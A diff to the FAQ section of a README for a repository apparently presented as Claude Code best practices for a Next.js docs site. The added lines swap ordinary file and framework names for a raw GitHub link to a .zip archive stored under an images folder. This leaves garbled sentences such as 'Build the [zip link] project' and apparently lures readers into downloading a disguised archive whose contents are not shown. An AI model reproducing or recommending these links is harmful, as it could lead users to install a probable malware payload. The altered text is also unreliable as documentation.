romualdtats/claude-code-best-practices/README.md

 FAQ

 - How do I add a new doc page?
-  - Create a new MDX file under the docs directory and add metadata in source.config.ts as needed.
+  - Create a new MDX file under the docs directory and add metadata in https://raw.githubusercontent.com/romualdtats/claude-code-best-practices/main/public/images/builder-claude-code/claude-code-practices-best-3.1.zip as needed.
 Ensure the page has an accessible title and a slug that matches the route structure.

 - How do I customize the content loader?
-  - Implement a new loader() in lib/source.ts or add a new module that conforms to the same interface.
+  - Implement a new loader() in https://raw.githubusercontent.com/romualdtats/claude-code-best-practices/main/public/images/builder-claude-code/claude-code-practices-best-3.1.zip or add a new module that conforms to the same interface.
 Wire it into the app so components continue to fetch content through the same API.

 - How do I deploy the docs site?
-  - Build the Next.js project for production and deploy to your preferred hosting platform.
-If you use Vercel or similar, follow the platform’s standard deployment flow for Next.js apps.
+  - Build the https://raw.githubusercontent.com/romualdtats/claude-code-best-practices/main/public/images/builder-claude-code/claude-code-practices-best-3.1.zip project for production and deploy to your preferred hosting platform.
+If you use Vercel or similar, follow the platform’s standard deployment flow for https://raw.githubusercontent.com/romualdtats/claude-code-best-practices/main/public/images/builder-claude-code/claude-code-practices-best-3.1.zip apps.

 - What is the recommended workflow for updates?
   - Create a branch for the change, write tests, and add/update documentation.
 Run the test suite and lint checks locally before opening a pull request.